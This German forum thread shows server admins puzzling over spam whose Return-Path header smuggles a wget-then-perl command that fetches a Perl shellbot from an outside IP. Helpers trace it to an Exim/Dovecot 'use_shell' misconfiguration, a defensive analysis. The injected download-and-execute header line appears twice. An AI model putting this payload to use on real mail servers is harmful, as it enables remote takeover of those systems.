Zurück   Trojaner-Board > Web/PC > Alles rund um Mac OSX & Linux

Alles rund um Mac OSX & Linux: Seltsame Mail von root, Trojaner zax.pl?

Windows 7 Für alle Fragen rund um Mac OSX, Linux und andere Unix-Derivate.

Antwort
Alt 19.06.2013, 07:32   #1
madking.eu
 
Seltsame Mail von root, Trojaner zax.pl? - Standard

Seltsame Mail von root, Trojaner zax.pl?



Hallo zusammen,

ich hatte heute 3 seltsame E-Mail in meinem Account von root. Sie waren alle gleich. Ich kann mir keinen richtigen Reim darauf machen.

Ich betreibe einen Server bei 1und1. Habe die Debian Minimalinstallation genommen und einen Mailserver aufgesetzt. Es können nur authentifizierte User E-Mails versenden und auch nur von einer Domain.

Hier der Quellcode der Mail:

Code:
ATTFilter
Return-Path: <"x`wget${IFS}-O${IFS}/tmp/zax.pl${IFS}hxxp://212.30.46.158/zax.pl``perl${IFS}/tmp/zax.pl`"@pacbell.net>
Delivered-To: admin@********
Received: by ********.onlinehome-server.info (Postfix)
	id 142C5513; Wed, 19 Jun 2013 02:16:42 +0200 (CEST)
Delivered-To: root@localhost
Received: from domain.local (unknown [212.30.46.158])
	by ********.onlinehome-server.info (Postfix) with ESMTP id D394CE7
	for <root@localhost>; Wed, 19 Jun 2013 02:16:41 +0200 (CEST)
X-Antivirus: avast! (VPS 130618-0, 18.06.2013), Inbound message
X-Antivirus-Status: Clean

x
         
Wenn ich die Adresse hxxp://212.30.46.158/zax.pl in meinem Browser unter Windows eingebe, springt sofort der Virenscanner an und meldet "Perl:Shellbot-O [Trj]".

Grüße,
Andreas

Alt 19.06.2013, 08:45   #2
t'john
/// Helfer-Team
 
Seltsame Mail von root, Trojaner zax.pl? - Standard

Seltsame Mail von root, Trojaner zax.pl?





wenn du an dieser Adresse eMails empfaengst, bekommst du auch welche

Es wird Milliarden an SPAM jede Stunde verschickt, oft auch einfach an standard Mail-Adressen wie admin@ info@ webmaster@ etc. pp.

Nichts ungewehnliches also.
__________________

__________________

Alt 19.06.2013, 08:52   #3
madking.eu
 
Seltsame Mail von root, Trojaner zax.pl? - Standard

Seltsame Mail von root, Trojaner zax.pl?



Ok danke für die Information. Dann bin ich ja beruhigt.

Mit der Mail wird anscheindend irgendwie versucht ein externes Script zu starten, die Befehle stehen im Return-Path. Dadurch dachte ich gleich an eine Sicherheitslücke.
__________________

Alt 19.06.2013, 08:56   #4
t'john
/// Helfer-Team
 
Seltsame Mail von root, Trojaner zax.pl? - Standard

Seltsame Mail von root, Trojaner zax.pl?



Das sehe ich auch so.
Es wird offensichtlich versucht ein Exploit auszunutzen umd den Server zu übernehmen.
__________________
Mfg, t'john
Das TB unterstützen

Alt 19.06.2013, 09:01   #5
madking.eu
 
Seltsame Mail von root, Trojaner zax.pl? - Standard

Seltsame Mail von root, Trojaner zax.pl?



Ich hab zu dem Script gegoogelt, aber nix gefunden.

Wäre interessant zu wissen, bei welchen Umständen dieser Exploit greift. Allerdings scheint das Script auch schon etwas älter zu sein. Habe mir mal die zax.pl Datei runtergeladen und im Header steht:


Code:
ATTFilter
#!/usr/bin/perl
####################################################
# Hawker Hunter v2.0 (ARZ Co. Ltd.) Legacy 2009(c) #
####################################################
         


Alt 19.06.2013, 10:48   #6
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Seltsame Mail von root, Trojaner zax.pl? - Standard

Seltsame Mail von root, Trojaner zax.pl?



Zitat:
Wäre interessant zu wissen, bei welchen Umständen dieser Exploit greift.
Wenn ich das richtig interpretiere, muss dieses Script auf der Konsole ausgeführt werden. Aber wer führt so ein Script schon freiwillig auf seinem Server aus?

Wenn ich mir deinen geposteten Link im Firefox anschaue, seh ich das Script selbst. Aber da wird nix ausgeführt
__________________
--> Seltsame Mail von root, Trojaner zax.pl?

Alt 20.06.2013, 13:07   #7
Kraakus
 
Seltsame Mail von root, Trojaner zax.pl? - Standard

Seltsame Mail von root, Trojaner zax.pl?



Hallo,

Das Thema hat mich jetzt hierher gebracht.

Also ich habe die gleiche E-Mail gestern erhalten. Auch hier hat mein Server mir diese E-Mail an meinen PLESK-Admin-Kontakt zugeschickt.

Allerdings wie? Mein Server ist 1 Monat alt und aktuell nur zum testen von PLESK 11.0.9#53. Ich habe zwar drei Domains eingerichtet, aber diese haben keinen Inhalt. Das Plesk-Panel selbst ist mit einer zusätzlichen htaccess geschützt und der Server hat nur Zugriff per "Private key file". Heißt jede andere Form der Anmeldung ist gesperrt. Auch der FTP ist deaktiviert.

Wieso habe ich also von meinem Server solch eine E-Mail erhalten?

Alt 20.06.2013, 13:47   #8
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Seltsame Mail von root, Trojaner zax.pl? - Standard

Seltsame Mail von root, Trojaner zax.pl?



Zitat:
Wieso habe ich also von meinem Server solch eine E-Mail erhalten?
Dein eigener Server hat diese Mail generiert, bist du dir da sicher?
__________________
Logfiles bitte immer in CODE-Tags posten

Alt 20.06.2013, 13:52   #9
Kraakus
 
Seltsame Mail von root, Trojaner zax.pl? - Standard

Seltsame Mail von root, Trojaner zax.pl?



Die E-Mail schaute so aus:

Zitat:
Return-Path: <"x`wget${IFS}-O${IFS}/tmp/zax.pl${IFS}hxxp://212.30.46.158/zax.pl``perl${IFS}/tmp/zax.pl`"@pacbell.net>
X-Original-To: MY-PLESK-EMAIL
Delivered-To: webXXXX@mail.webgo24-server13.de
X-Greylist: delayed 568 seconds by postgrey-1.32 at webgo24-server13.de; Wed, 19 Jun 2013 02:48:21 CEST
Received: from rsXXXXX.rs.hosteurope.de (rsXXXXX.rs.hosteurope.de [MY-SERVER-IP])
by mail.webgo24-server13.de (Postfix) with ESMTPS id D3F65304034A
for <MY-PLESK-EMAIL>; Wed, 19 Jun 2013 02:48:20 +0200 (CEST)
Received: by rsXXXXX.rs.hosteurope.de (Postfix)
id 2A2C860116; Wed, 19 Jun 2013 02:38:51 +0200 (CEST)
Delivered-To: root@localhost.localdomain
Received: by rsXXXXX.rs.hosteurope.de (Postfix)
id 28C3560117; Wed, 19 Jun 2013 02:38:51 +0200 (CEST)
Delivered-To: postmaster@localhost.rs.hosteurope.de
X-No-Auth: unauthenticated sender
X-No-Relay: not in my network
Received: from domain.local (unknown [212.30.46.158])
by rsXXXXX.rs.hosteurope.de (Postfix) with ESMTP id E637060116
for <postmaster@localhost>; Wed, 19 Jun 2013 02:38:50 +0200 (CEST)


x
Das sind meine Serverdaten:
Zitat:
Received: from rsXXXXX.rs.hosteurope.de (rsXXXXX.rs.hosteurope.de [MY-SERVER-IP])
Wo auch die E-Mail in Plesk als Admin hinterlegt ist. Die E-Mail selbst liegt bei webgo24, einem anderen Server.

Alt 20.06.2013, 14:08   #10
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Seltsame Mail von root, Trojaner zax.pl? - Standard

Seltsame Mail von root, Trojaner zax.pl?



Zitat:
Received: from domain.local (unknown [212.30.46.158])
by rsXXXXX.rs.hosteurope.de (Postfix) with ESMTP id E637060116
Hm, bedeutet das nicht, dass du die Mail von [212.30.46.158] bekommen hast? Also dein Server nur der Empfänger ist? Die Quelle ist übrigens die gleiche IP, auf dem dieses pl-Script über http verfügbar ist.


Zitat:
Return-Path: <"x`wget${IFS}-O${IFS}/tmp/zax.pl${IFS}hxxp://212.30.46.158/zax.pl``perl${IFS}/tmp/zax.pl`"@pacbell.net>
Hm, schau dir mal an was im Returnpath steht; darüber wird versucht per wget das pl-Script nach /tmp zu laden und dann auch zu starten....
__________________
Logfiles bitte immer in CODE-Tags posten

Alt 20.06.2013, 14:16   #11
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Seltsame Mail von root, Trojaner zax.pl? - Standard

Seltsame Mail von root, Trojaner zax.pl?



Nachtrag: hiermal ein Artikel den ich gefunden habe => Vom Advisory zum Exploit binnen eines Tages - Aus dem Leben eines Szlauszafs

Zitat:
Am Freitag, dem dritten Mai, wurde ein Warnhinweis (Advisory) auf eine weit verbreitete Fehlkonfiguration in der Kombination von Exim mit Dovecot publiziert: ein offenbar seit 23.10.2009 im Dovecot-Wiki veröffentliches Konfigurationsbeispiel für Exim, mit dem eingehende E-Mails durch den zu Dovecot gehörenden LDA deliver ausgeliefert werden sollen, enthielt auch die Option “use_shell”, die dazu führt, dass der Aufruf insgesamt zur Ausführung an die Shell weitergegeben wird. Das is potentiell unsicher, wie auch die Exim-Dokumentation erläutert:
__________________
Logfiles bitte immer in CODE-Tags posten

Alt 20.06.2013, 16:00   #12
Kraakus
 
Seltsame Mail von root, Trojaner zax.pl? - Standard

Seltsame Mail von root, Trojaner zax.pl?



Wow! Danke schön! Zum Glück habe ich weder Exim, noch Dovecot. ^^°

Man hat mir erklärt und auch gezeigt dass derjenige wohl über telnet, einfach an "postmaster", gesendet hat, welches dann an meine Admin-Adresse weiterleitet. Danke, damit wäre das geklärt.

Alt 20.06.2013, 17:40   #13
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Seltsame Mail von root, Trojaner zax.pl? - Standard

Seltsame Mail von root, Trojaner zax.pl?



Zitat:
Wow! Danke schön! Zum Glück habe ich weder Exim, noch Dovecot. ^^°
Trotzdem immer die Augen offen halten und auf sichere/sinnvolle Konfig achten

Zitat:
Man hat mir erklärt und auch gezeigt dass derjenige wohl über telnet,
Dann stimmst du mir also zu, dass nicht dein Server die Mail generiert hat?
Diese Mail war "einfach" nur ein Versuch eine unsichere Konfig auszunutzen, hätte ich mir mal eher den returnpath angeschaut wäre ich auch eher drauf gekommen, ich kann mir kaum vorstellen, dass jmd so ein Shellscript absichtlich selbst ausführt
__________________
Logfiles bitte immer in CODE-Tags posten

Alt 20.06.2013, 18:02   #14
mort
 
Seltsame Mail von root, Trojaner zax.pl? - Standard

Seltsame Mail von root, Trojaner zax.pl?



Der Script hat scheint was an einen IRC Server zu schicken.

Alt 20.06.2013, 18:06   #15
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Seltsame Mail von root, Trojaner zax.pl? - Icon31

Seltsame Mail von root, Trojaner zax.pl?



Zitat:
Zitat von mort Beitrag anzeigen
Der Script hat scheint was an einen IRC Server zu schicken.
Wird ja auch als Shell-Bot klassifiziert
__________________
Logfiles bitte immer in CODE-Tags posten

Antwort

Themen zu Seltsame Mail von root, Trojaner zax.pl?
212.30.46.158, account, admin, adresse, avast, browser, debian, e-mail, fix, hallo zusammen, heute, linux, mail, mailserver, melde, meldet, quellcode, scan, scanner, seltsame, server, trojaner, versenden, virenscan, virenscanner, windows, zax.pl, zusammen




Ähnliche Themen: Seltsame Mail von root, Trojaner zax.pl?


  1. Seltsame E-Mail zurück bekommen (failure notice) beim E-Mail-Versand
    Überwachung, Datenschutz und Spam - 14.09.2015 (7)
  2. IMAC OS X Version 10.8.6 Safari 5.1.10: Trojaner durch Mail & Media GmbH e-mail ?
    Plagegeister aller Art und deren Bekämpfung - 23.02.2015 (3)
  3. Windows 7: Neue E-Mail Adresse erstellt und gleich Spoof Mail bekommen... Ebay rät Trojaner Check!
    Log-Analyse und Auswertung - 14.04.2014 (78)
  4. Windows XP: PC bootet nicht mehr richtig (Trojaner, Root-, Bootkit?)
    Log-Analyse und Auswertung - 19.03.2014 (19)
  5. Root.Necurs
    Log-Analyse und Auswertung - 08.05.2013 (10)
  6. Ominöse Mail (mit Trojaner) in meinem GMX-Spam-Mail-Ordner
    Überwachung, Datenschutz und Spam - 07.04.2013 (3)
  7. windows root\system32\hal.dll
    Alles rund um Windows - 14.05.2011 (2)
  8. OOPS - Root-Rechte auf Linux
    Nachrichten - 08.12.2010 (0)
  9. Disabled.SecurityCenter und root.Trojaner
    Plagegeister aller Art und deren Bekämpfung - 09.10.2010 (11)
  10. Trojaner - Firefox langsam, seltsame Scripts im Quellcode..
    Plagegeister aller Art und deren Bekämpfung - 17.08.2010 (2)
  11. seltsame Musik im Browser Trojaner?
    Plagegeister aller Art und deren Bekämpfung - 11.08.2010 (12)
  12. Root kits - wie vorgehen
    Plagegeister aller Art und deren Bekämpfung - 03.01.2010 (11)
  13. Root-Server?
    Netzwerk und Hardware - 04.01.2008 (1)
  14. Seltsame e-mail bekommen
    Plagegeister aller Art und deren Bekämpfung - 24.03.2007 (2)
  15. seltsame mail.irgendein Virus?
    Plagegeister aller Art und deren Bekämpfung - 01.03.2004 (3)
  16. root-Passwort für mySQL
    Alles rund um Windows - 04.09.2003 (3)

Zum Thema Seltsame Mail von root, Trojaner zax.pl? - Hallo zusammen, ich hatte heute 3 seltsame E-Mail in meinem Account von root. Sie waren alle gleich. Ich kann mir keinen richtigen Reim darauf machen. Ich betreibe einen Server bei - Seltsame Mail von root, Trojaner zax.pl?...
Archiv
Du betrachtest: Seltsame Mail von root, Trojaner zax.pl? auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.